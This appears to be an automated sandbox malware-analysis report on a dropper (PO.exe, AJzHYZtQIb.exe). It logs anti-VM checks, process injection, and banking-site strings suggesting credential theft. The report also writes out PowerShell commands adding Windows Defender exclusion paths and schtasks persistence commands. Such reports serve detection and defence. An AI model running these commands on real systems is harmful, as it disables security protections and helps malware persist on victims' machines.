Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 8DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 9DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 9FE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: AFE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 2F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 78A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6787
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1105
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1006
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 1705
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 4241
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Window / User API: threadDelayed 1893
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Window / User API: threadDelayed 6517

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7832	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 3292	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 4996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 8060	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7060	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001986E8 FindFirstFileExA,

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018BC1D VirtualQuery,GetSystemInfo,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe

Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp37DC.tmp.14.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp37DC.tmp.14.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp37DC.tmp.14.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp37DC.tmp.14.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmp37DC.tmp.14.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp37DC.tmp.14.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp37DC.tmp.14.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2356294737.000000000118F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp37DC.tmp.14.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp37DC.tmp.14.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AJzHYZtQIb.exe, 00000010.00000002.2243982983.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp37DC.tmp.14.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp37DC.tmp.14.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PO.exe, 00000007.00000002.2162816611.0000000007044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp37DC.tmp.14.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp37DC.tmp.14.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp37DC.tmp.14.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp37DC.tmp.14.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_001953C2 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_001993D0 GetProcessHeap,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001912B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D3E5 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018C69D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory written: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

